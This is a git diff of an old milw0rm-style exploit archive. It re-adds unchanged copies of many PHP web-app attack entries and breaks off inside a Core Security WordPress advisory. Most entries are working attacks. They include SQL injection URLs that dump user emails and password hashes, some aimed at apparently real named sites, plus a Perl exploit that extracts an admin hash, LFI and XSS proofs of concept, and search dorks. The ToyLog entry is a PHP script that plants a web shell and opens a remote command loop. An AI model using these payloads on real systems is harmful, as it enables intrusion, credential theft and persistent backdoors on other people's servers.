+==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
+
+=========================================================
+
+==> GreeTz :
+
+==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM
+
+=========================================================
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9095.txt b/platforms/php/webapps/9095.txt
index da65927a7..29db3fb56 100755
--- a/platforms/php/webapps/9095.txt
+++ b/platforms/php/webapps/9095.txt
@@ -1,21 +1,21 @@
-JIKO No-exploit.Com
-Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
-Script : talkback V 2.3.14
-Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
-Edit Comment ~[+]
-talkback/comments.php?edit=1&edit_id=2&
-Command ~[+]
-talkback/addons/import.php?result=[Command]
- Code;
- $last_line = system($command, $result);
-Local File ~[+]
- Note : if floder install not deleted
-http://localhost/test/talkback/install/help.php?language=[File]
- code;
- $file = "../language/{$_REQUEST['language']}.php";
- if (!is_file($file))
- exit("Language file '$file' does not exist");
- include ($file);
-
-# milw0rm.com [2009-07-09]
+JIKO No-exploit.Com
+Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
+Script : talkback V 2.3.14
+Dork:inurl:test.php Powered by TalkBack
+-------------------------------------------
+Edit Comment ~[+]
+talkback/comments.php?edit=1&edit_id=2&
+Command ~[+]
+talkback/addons/import.php?result=[Command]
+ Code;
+ $last_line = system($command, $result);
+Local File ~[+]
+ Note : if floder install not deleted
+http://localhost/test/talkback/install/help.php?language=[File]
+ code;
+ $file = "../language/{$_REQUEST['language']}.php";
+ if (!is_file($file))
+ exit("Language file '$file' does not exist");
+ include ($file);
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9098.txt b/platforms/php/webapps/9098.txt
index 55b000461..6f4fd3116 100755
--- a/platforms/php/webapps/9098.txt
+++ b/platforms/php/webapps/9098.txt
@@ -1,74 +1,74 @@ -======================================================================================================================================================== - - - [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability - - Software : Siteframe CMS version 3.2.x - Vendor : http://siteframe.org/ - Download : http://sitefrane.org/downloads/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -======================================================================================================================================================== - - - [o] Description - - Siteframe™ is a lightweight content-management system - designed for the rapid deployment of community-based websites. - With Siteframe, a group of users can share stories and photographs, - create blogs, send email to one another, and participate in group activities. - Siteframe enables this by providing web-based content management - so that anyone can create content without needing to learn HTML. 
- - - - [o] Vulnerable file - - document.php - - - - [o] Exploit - - http://localhost/[path]/document.php?id=[SQL] - http://localhost/[path]/phpinfo.php - - - - [o] Proof of concept - - http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users-- - http://digi-forum.com/frame/phpinfo.php - http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users-- - http://myolympus.org/phpinfo.php - - - - [o] Dork - - "Powered by Siteframe" - - - - [o] Notes - - Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest) - - -======================================================================================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/news ] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang - H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella - skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke - - -======================================================================================================================================================== - -# milw0rm.com [2009-07-09] +======================================================================================================================================================== + + + [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability + + Software : Siteframe CMS version 3.2.x + Vendor : http://siteframe.org/ + Download : http://sitefrane.org/downloads/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +======================================================================================================================================================== + + + [o] Description + + Siteframe™ is a lightweight content-management system + designed for the rapid deployment of community-based 
websites. + With Siteframe, a group of users can share stories and photographs, + create blogs, send email to one another, and participate in group activities. + Siteframe enables this by providing web-based content management + so that anyone can create content without needing to learn HTML. + + + + [o] Vulnerable file + + document.php + + + + [o] Exploit + + http://localhost/[path]/document.php?id=[SQL] + http://localhost/[path]/phpinfo.php + + + + [o] Proof of concept + + http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users-- + http://digi-forum.com/frame/phpinfo.php + http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users-- + http://myolympus.org/phpinfo.php + + + + [o] Dork + + "Powered by Siteframe" + + + + [o] Notes + + Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest) + + +======================================================================================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/news ] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang + H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella + skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke + + +======================================================================================================================================================== + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/9099.pl b/platforms/php/webapps/9099.pl index 0ff421d47..1c27e332b 100755 --- a/platforms/php/webapps/9099.pl +++ b/platforms/php/webapps/9099.pl 
@@ -1,39 +1,39 @@ -#!/usr/bin/perl -w -# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit -# Demo : http://www.universe.uni.org.pl -# Download : http://www.universe.uni.org.pl/upload/universecms106.rar -# Found by : Mr.tro0oqy -# E-mail : t.4@windowslive.com -# special thank for my teacher "Stack" -######################################## -system("color e"); -print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n"; -print "\t\t0 Universe CMS 1.0.6 (id) Remote SQL Injection Exploit 0\n\n"; -print "\t\t0 by Mr.tro0oqy 0\n\n"; -print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n"; -use LWP::UserAgent; -die "Example: perl $0 http://target.com/path \n" unless @ARGV; -$user="login"; -$pass="password"; -$tab="uni_users"; -$b = LWP::UserAgent->new() or die "error\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $ARGV[0] . "/vnews.php?id=-1+union+select+1,2,3,4,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),6+from+".$tab."&print=1"; -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; -if ($answer =~ /(.*?)/){ - print "\ loading .....\n"; - print "\n[+] Admin User : $1"; -} -if ($answer =~/(.*?)/) -{ -print "\n[+] Admin Hash : $1\n\n"; -print "\t\t# %100 #\n\n";} - -else -{ -print "\n[-] Exploit Failed...\n"; -} - -# milw0rm.com [2009-07-09] +#!/usr/bin/perl -w +# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit +# Demo : http://www.universe.uni.org.pl +# Download : http://www.universe.uni.org.pl/upload/universecms106.rar +# Found by : Mr.tro0oqy +# E-mail : t.4@windowslive.com +# special thank for my teacher "Stack" +######################################## +system("color e"); +print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n"; +print "\t\t0 Universe CMS 1.0.6 (id) Remote SQL Injection Exploit 0\n\n"; +print "\t\t0 by Mr.tro0oqy 0\n\n"; +print 
"\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n"; +use LWP::UserAgent; +die "Example: perl $0 http://target.com/path \n" unless @ARGV; +$user="login"; +$pass="password"; +$tab="uni_users"; +$b = LWP::UserAgent->new() or die "error\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $ARGV[0] . "/vnews.php?id=-1+union+select+1,2,3,4,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),6+from+".$tab."&print=1"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; +if ($answer =~ /(.*?)/){ + print "\ loading .....\n"; + print "\n[+] Admin User : $1"; +} +if ($answer =~/(.*?)/) +{ +print "\n[+] Admin Hash : $1\n\n"; +print "\t\t# %100 #\n\n";} + +else +{ +print "\n[-] Exploit Failed...\n"; +} + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/910.pl b/platforms/php/webapps/910.pl index a8fd8c8b3..458e4ec20 100755 --- a/platforms/php/webapps/910.pl +++ b/platforms/php/webapps/910.pl @@ -67,6 +67,6 @@ while ($answer = <$socket>) } print " [-] Exploit failed\n"; -#### EOF #### - -# milw0rm.com [2005-04-04] +#### EOF #### + +# milw0rm.com [2005-04-04] diff --git a/platforms/php/webapps/9101.txt b/platforms/php/webapps/9101.txt index 9f5f846fc..277697860 100755 --- a/platforms/php/webapps/9101.txt +++ b/platforms/php/webapps/9101.txt 
@@ -1,68 +1,68 @@ -phpBMS v0.96 -phpbms.org - -eLwaux(c)2009, uasc.org.ua -http://phpbms.org/trial/ - - -## ## ## -SQL Inj -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - $querystatement="SELECT -if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value) - AS value FROM discounts WHERE id=".$_GET["id"]; - $queryresult = $db->query($querystatement); -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()) - - - -## ## ## -SQL Inj -\dbgraphic.php -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM -".$_GET["t"]." 
WHERE id=".$_GET["r"]; - $queryresult=$db->query($querystatement); -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1 - - -## ## ## -SQL Inj -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - if(isset($_GET["cmd"])){ - switch($_GET["cmd"]){ - case "show": - showSearch($_GET["tid"],$_GET["base"],$db); - break; - }//end switch -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -PoC: - /advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2 - /advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2 - - -## ## ## -pXSS -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -
    "> -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -PoC: - \index.php/">
    {XSS} - \phpbms\modules\base\adminsettings.php\">{XSS} - - -## ## ## -Path Disclosure - /footer.php - /header.php - /advancedsearch.php?cmd=show& - /choicelist.php - -# milw0rm.com [2009-07-10] +phpBMS v0.96 +phpbms.org + +eLwaux(c)2009, uasc.org.ua +http://phpbms.org/trial/ + + +## ## ## +SQL Inj +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + $querystatement="SELECT +if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value) + AS value FROM discounts WHERE id=".$_GET["id"]; + $queryresult = $db->query($querystatement); +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()) + + + +## ## ## +SQL Inj +\dbgraphic.php +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM +".$_GET["t"]." 
WHERE id=".$_GET["r"]; + $queryresult=$db->query($querystatement); +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1 + + +## ## ## +SQL Inj +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + if(isset($_GET["cmd"])){ + switch($_GET["cmd"]){ + case "show": + showSearch($_GET["tid"],$_GET["base"],$db); + break; + }//end switch +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +PoC: + /advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2 + /advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2 + + +## ## ## +pXSS +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + "> +------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +PoC: + \index.php/">
    {XSS} + \phpbms\modules\base\adminsettings.php\">{XSS} + + +## ## ## +Path Disclosure + /footer.php + /header.php + /advancedsearch.php?cmd=show& + /choicelist.php + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9103.txt b/platforms/php/webapps/9103.txt index d9e520cab..1258d9d37 100755 --- a/platforms/php/webapps/9103.txt +++ b/platforms/php/webapps/9103.txt 
@@ -1,43 +1,43 @@ -GenCMS -http://gencms.berlios.de/ - -eLwaux(c)2009 - -LFI -/show.php ----------------------------------------------------------------------------------------------------- -18: $param = $_GET['p']; -19: if(empty($param)) $param = 'news'; -20: //get right page -21: //$page = $param.'.php'; -22: -23: //static or dynamic -24: if(GC_FULLSTATIC) -25: { -26: $page = $param.'.htm'; -27: staticpage($page); -28: } -29: else -30: { -31: $page = GC_IPATH.'_base/sites/'.$param.'.php'; -32: dynamicpage($page); -33: } ----------------------------------------------------------------------------------------------------- -PoC: /show.php?p=../../{FILE.PHP}%00 - - -LFI -/admin/pages/SiteNew.php ----------------------------------------------------------------------------------------------------- -14: if(!empty($_GET['step'])) $Step = $_GET['step']; -23: if ($Step == "2") -24: { -25: // allgemeine settings -26: //include blocks from template config -27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php'); -28: $TPLBlocks = explode(';',$TemplateSettings); -29: } ----------------------------------------------------------------------------------------------------- -PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 ) - -# milw0rm.com [2009-07-10] +GenCMS +http://gencms.berlios.de/ + +eLwaux(c)2009 + +LFI +/show.php +---------------------------------------------------------------------------------------------------- +18: $param = $_GET['p']; +19: if(empty($param)) $param = 'news'; +20: //get right page +21: //$page = $param.'.php'; +22: +23: //static or dynamic +24: if(GC_FULLSTATIC) +25: { +26: $page = $param.'.htm'; +27: staticpage($page); +28: } +29: else +30: { +31: $page = GC_IPATH.'_base/sites/'.$param.'.php'; +32: dynamicpage($page); +33: } +---------------------------------------------------------------------------------------------------- +PoC: /show.php?p=../../{FILE.PHP}%00 + + +LFI +/admin/pages/SiteNew.php 
+---------------------------------------------------------------------------------------------------- +14: if(!empty($_GET['step'])) $Step = $_GET['step']; +23: if ($Step == "2") +24: { +25: // allgemeine settings +26: //include blocks from template config +27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php'); +28: $TPLBlocks = explode(';',$TemplateSettings); +29: } +---------------------------------------------------------------------------------------------------- +PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 ) + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9105.txt b/platforms/php/webapps/9105.txt index 3402e3e14..0f5f46f71 100755 --- a/platforms/php/webapps/9105.txt +++ b/platforms/php/webapps/9105.txt 
@@ -1,27 +1,27 @@ - ################################################################### -################################################################### -MyMsg 1.0.3 (Profile.php ) Remote SQL Injection Vuln -################################################################### -Founder : Monster-Dz -Mail: u.2d[at]Hotmail[dot]CoM -################################################################### -Download:http://www.mymsg.al4us.com/index.php?Page=Download -Home: WwW.Sa-SaFe.NeT ( H4ckF0rU.CoM Back Sooon ) -################################################################### -SQL Injection Vulnerability -################################################################### -Exploit: -################################################################### - 1) First Register On ThE Site http://www.victim.com/User.php?Action=New - 2) Login - 3) Example: You Will Go At That Link http://www.victim.com/Boxes.php?SES_ID=5f97b23814644739be5ac2d335773753&box=1 - 4) Exploit: - --------- - http://www.victim.com/Profile.php?SES_ID=| Your Session Id |&do=show&uid=-225+union+select+1,2,3,4,concat(Admin_Name,0x3a,Admin_Password),6,7,8,9,10,11,12+from+tbl_setting-- -Demo ----- -http://www.mymsg.al4us.com/Demo/MyMsg_1.0.3/ -#################################################################### -Greeting : MasTer_Fin@L - ThE g0bL!N - Sarbot511 - DrEaDFuL aNd All My Friends - -# milw0rm.com [2009-07-10] + ################################################################### +################################################################### +MyMsg 1.0.3 (Profile.php ) Remote SQL Injection Vuln +################################################################### +Founder : Monster-Dz +Mail: u.2d[at]Hotmail[dot]CoM +################################################################### +Download:http://www.mymsg.al4us.com/index.php?Page=Download +Home: WwW.Sa-SaFe.NeT ( H4ckF0rU.CoM Back Sooon ) +################################################################### +SQL Injection Vulnerability 
+################################################################### +Exploit: +################################################################### + 1) First Register On ThE Site http://www.victim.com/User.php?Action=New + 2) Login + 3) Example: You Will Go At That Link http://www.victim.com/Boxes.php?SES_ID=5f97b23814644739be5ac2d335773753&box=1 + 4) Exploit: + --------- + http://www.victim.com/Profile.php?SES_ID=| Your Session Id |&do=show&uid=-225+union+select+1,2,3,4,concat(Admin_Name,0x3a,Admin_Password),6,7,8,9,10,11,12+from+tbl_setting-- +Demo +---- +http://www.mymsg.al4us.com/Demo/MyMsg_1.0.3/ +#################################################################### +Greeting : MasTer_Fin@L - ThE g0bL!N - Sarbot511 - DrEaDFuL aNd All My Friends + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9107.txt b/platforms/php/webapps/9107.txt index cf6fe4a47..70f3d8d63 100755 --- a/platforms/php/webapps/9107.txt +++ b/platforms/php/webapps/9107.txt 
@@ -1,28 +1,28 @@ -##################################################################################### -#### Phenotype v2.8 Blind Sql Injection #### -##################################################################################### -# # -#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # -#Discovered by : Sina Yazdanmehr (R3d.W0rm) # -#Our Site : http://ircrash.com # -#My Official WebSite : http://r3dw0rm.ir # -#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Download : http://www.phenotype-cms.com # -# # -#Dork : :( # -# # -##################################################################################### -# [Bug] # -# # -#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/* -#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/* -# # -#Note : # -#1. This bug in admin folder, but u dont need to login,u can use bug with out login # -#2. 
If ascii is true u see login page else u see 500 Internal Server Error # -# # -###################################### TNX GOD ###################################### - -# milw0rm.com [2009-07-10] +##################################################################################### +#### Phenotype v2.8 Blind Sql Injection #### +##################################################################################### +# # +#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # +#Discovered by : Sina Yazdanmehr (R3d.W0rm) # +#Our Site : http://ircrash.com # +#My Official WebSite : http://r3dw0rm.ir # +#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Download : http://www.phenotype-cms.com # +# # +#Dork : :( # +# # +##################################################################################### +# [Bug] # +# # +#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/* +#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/* +# # +#Note : # +#1. This bug in admin folder, but u dont need to login,u can use bug with out login # +#2. If ascii is true u see login page else u see 500 Internal Server Error # +# # +###################################### TNX GOD ###################################### + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9109.txt b/platforms/php/webapps/9109.txt index a0fc08200..f777ca1d6 100755 --- a/platforms/php/webapps/9109.txt +++ b/platforms/php/webapps/9109.txt 
@@ -1,82 +1,82 @@ ---+++=====================================================================================+++-- ---+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++-- ---+++=====================================================================================+++-- - -[+] SQL Injection Vulnerability -Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user - -[+] Remote Command Execution Exploit - -#!/usr/bin/php - +\n". - "- Ex. : php xpl.php http://localhost/ToyLog/ -\n". - "+ +\n". - "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n". - "\n"); -} - -function hex_format ($string) { - $i=0; - while ($i(.+?) on|", fgets ($fp, 1024), $data)) - $path = $data [1]; - list ($path) = explode ("block/db.php", $path); - fclose ($fp); - return $path; -} - -function upload_shell ($host, $dir) { - $fp = fsockopen ($host, 80); - $shell_path = get_path ($host, $dir)."shell.php"; - if (!strcmp ($shell_path, "shell.php")) - die ("[-] Exploit failed.\n"); - $query = hex_format('1 UNION ALL SELECT 1,2,\'xxxxxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post'); - $req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n". - "Host: {$host}\r\n". 
- "Connection: Close\r\n\r\n"; - fputs ($fp, $req); - fclose ($fp); -} - -if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data)) - usage (); -array_shift ($data); -list ($host, $dir) = $data; -upload_shell ($host, $dir); -$stdin = fopen ("php://stdin", "r"); -while (1) { - echo "backdoor@{$host}: "; - $cmd = hex_format(trim (fgets ($stdin, 1024))); - if (!strcmp ($cmd, hex_format("exit"))) - break; - $out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}")); - array_shift ($out); - array_pop ($out); - echo $out [0]; -} - -?> - -# milw0rm.com [2009-07-10] +--+++=====================================================================================+++-- +--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++-- +--+++=====================================================================================+++-- + +[+] SQL Injection Vulnerability +Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user + +[+] Remote Command Execution Exploit + +#!/usr/bin/php + +\n". + "- Ex. : php xpl.php http://localhost/ToyLog/ -\n". + "+ +\n". + "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n". + "\n"); +} + +function hex_format ($string) { + $i=0; + while ($i(.+?) on|", fgets ($fp, 1024), $data)) + $path = $data [1]; + list ($path) = explode ("block/db.php", $path); + fclose ($fp); + return $path; +} + +function upload_shell ($host, $dir) { + $fp = fsockopen ($host, 80); + $shell_path = get_path ($host, $dir)."shell.php"; + if (!strcmp ($shell_path, "shell.php")) + die ("[-] Exploit failed.\n"); + $query = hex_format('1 UNION ALL SELECT 1,2,\'xxxxxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post'); + $req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n". + "Host: {$host}\r\n". 
+ "Connection: Close\r\n\r\n"; + fputs ($fp, $req); + fclose ($fp); +} + +if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data)) + usage (); +array_shift ($data); +list ($host, $dir) = $data; +upload_shell ($host, $dir); +$stdin = fopen ("php://stdin", "r"); +while (1) { + echo "backdoor@{$host}: "; + $cmd = hex_format(trim (fgets ($stdin, 1024))); + if (!strcmp ($cmd, hex_format("exit"))) + break; + $out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}")); + array_shift ($out); + array_pop ($out); + echo $out [0]; +} + +?> + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9110.txt b/platforms/php/webapps/9110.txt index cedda96cc..baa852ec0 100755 --- a/platforms/php/webapps/9110.txt +++ b/platforms/php/webapps/9110.txt 
@@ -1,483 +1,483 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - -WordPress Privileges Unchecked in admin.php and Multiple Information -Disclosures - - - -1. *Advisory Information* - -Title: WordPress Privileges Unchecked in admin.php and Multiple -Information Disclosures -Advisory ID: CORE-2009-0515 -Advisory URL: -http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked -Date published: 2009-07-08 -Date of last update: 2009-07-08 -Vendors contacted: WordPress -Release mode: Coordinated release - - -2. *Vulnerability Information* - -Class: Local file include, Privileges unchecked, Cross site scripting -(XSS), Information disclosure -Remotely Exploitable: Yes -Locally Exploitable: No -Bugtraq ID: 35581, 35584 -CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336 - - -3. *Vulnerability Description* - -WordPress is a web application written in PHP that allows the easy -installation of a flexible weblog on any computer connected to the -Internet. WordPress 2.7 reached more than 6 million downloads during -June 2009 [9]. - -A vulnerability was found in the way that WordPress handles some URL -requests. This results in unprivileged users viewing the content of -plugins configuration pages, and also in some plugins modifying plugin -options and injecting JavaScript code. Arbitrary native code may be run -by a malicious attacker if the blog administrator runs injected -JavasScript code that edits blog PHP code. Many WordPress-powered blogs, -hosted outside 'wordpress.com', allow any person to create unprivileged -users called subscribers. Other sensitive username information -disclosures were found in WordPress. - - -4. *Vulnerable packages* - - . WordPress 2.8 and previous - . WordPress MU 2.7.1 and previous, used in WordPress.com - - -5. *Non-vulnerable packages* - - . WordPress 2.8.1 - . 
WordPress MU 2.8.1, used in WordPress.com - - -6. *Vendor Information, Solutions and Workarounds* - -Mitigation for the Privileges Unchecked vulnerability (suggested by Core -Security): this vulnerability may be mitigated by controlling access to -files inside the 'wp-admin' folder. Access can be prohibited by using -Apache access control mechanism ('.htaccess' file), see guideline for -more information [11]. - - -7. *Credits* - -These vulnerabilities were discovered and researched by Fernando -Arnaboldi and José Orlicki from Core Security Technologies. Further -research was made by Jose Orlicki from Core Security Technologies. - - -8. *Technical Description / Proof of Concept Code* - - -8.1. *Introduction* - -In the last few years several security bugs were found in WordPress -[1][2]. During 2008, the big amount of bugs reported by researchers lead -to exploitation by blog spammers [3]. During 2009, a new round of -attacks has appeared and security researchers are reporting new bugs or -wrongly fixed previously-reported bugs [4][5]. A path traversal in local -files included by 'admin.php' has been fixed [6][7] but, in our case, we -report that administrative privileges are still unchecked when accessing -any PHP file inside a plugin folder. - - -8.2. *Access Control Roles* - -WordPress has a privilege model where any user has an assigned role [8]. -Regarding plugins only users characterized by the role Administrator can -activate plugins. Notice that only the blog hosting owner can add new -plugins because these must by copied inside the host filesystem. The -roles Editor, Author or Subscriber (the latter has the least privileges) -cannot activate plugins, edit plugins, update plugins nor delete plugins -installed by an Administrator. Besides that, the configuration of -specific plugins is a grey area because there is no distinguished -capability assigned [8]. 
- -Also due to cross-site scripting vulnerabilities inside plugins options -(something very common), non-administrative users reconfiguring plugins -may inject persistent JavaScript code. Possibly arbitrary native code -can be executed by the attacker if the blog administrator runs injected -JavasScript code that injects PHP code. It is important to observe that -many WordPress-powered blogs are configured to allow any blog visitor to -create a Subscriber user without confirmation from the Administrator -role inside the following URL, although by default the Administrator -role must create these new users. - -/----------- - -http://[some_wordpress_blog]/wp-login.php?action=register -- -----------/ - - This can be modified by the administrator in 'Membership/Anyone can -register'. - -/----------- - -http://[some_wordpress_blog]/wp-admin/options-general.php -- -----------/ - - - - -8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes -(CVE-2009-2334, BID 35581)* - -No privileges are checked on WordPress plugins configuration PHP modules -using parameter 'page' when we replace 'options-general.php' with -'admin.php'. The same thing happens when replacing other modules such as -'plugins.php' with 'admin.php'. Basic information disclosure is done -this way. For example, with the following URL a user with no privileges -can see the configuration of plugin Collapsing Archives, if installed. - -/----------- - -http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt -- -----------/ - - Instead of the following allowed URL. - -/----------- - -http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt -- -----------/ - - Another example of this information disclosure is shown on Akismet, a -plugin shipped by default with WordPress. 
- -/----------- - -http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt -- -----------/ - - All plugins we have tested are vulnerable to this kind of information -disclosure, but in many of them the PHP files accessed just crashed. On -the other hand, for example, with capability 'import', privileges are -checked inside 'admin.php': - -/----------- - -if ( ! current_user_can('import') ) - wp_die(__('You are not allowed to import.')); -- -----------/ - - More dangerous scenarios exist, all of them can be exploited by users -with the Subscriber role, the least privileged. - - -8.4. *Abuse example: XSS in plugin configuration module* - -If installed, *Related Ways To Take Action* is an example of a WordPress -plugin that is affected by many cross-site scripting vulnerabilities -(XSS) that can be leveraged by an attacker using the unchecked -privileges described in this advisory to inject persistent JavaScript -code. Possibly, arbitrary native code can be executed by the attacker if -the blog administrator, when he/she logs in, runs injected JavasScript -code that edits blog PHP code. The original URL for reconfiguring the -plugin can be accessed only by the Administrator role. - -/----------- - -http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php -- -----------/ - - But replacing the PHP file with the generic 'admin.php' any blog user -can modify this configuration. - -/----------- - -http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php -- -----------/ - - The following JavaScript injection can be entered within field *Exclude -actions by term* to exemplify this kind of abuse. When the administrator -enters the same page the injected browser code will be executed and -possibly blog PHP can be modified to run arbitrary native code. 
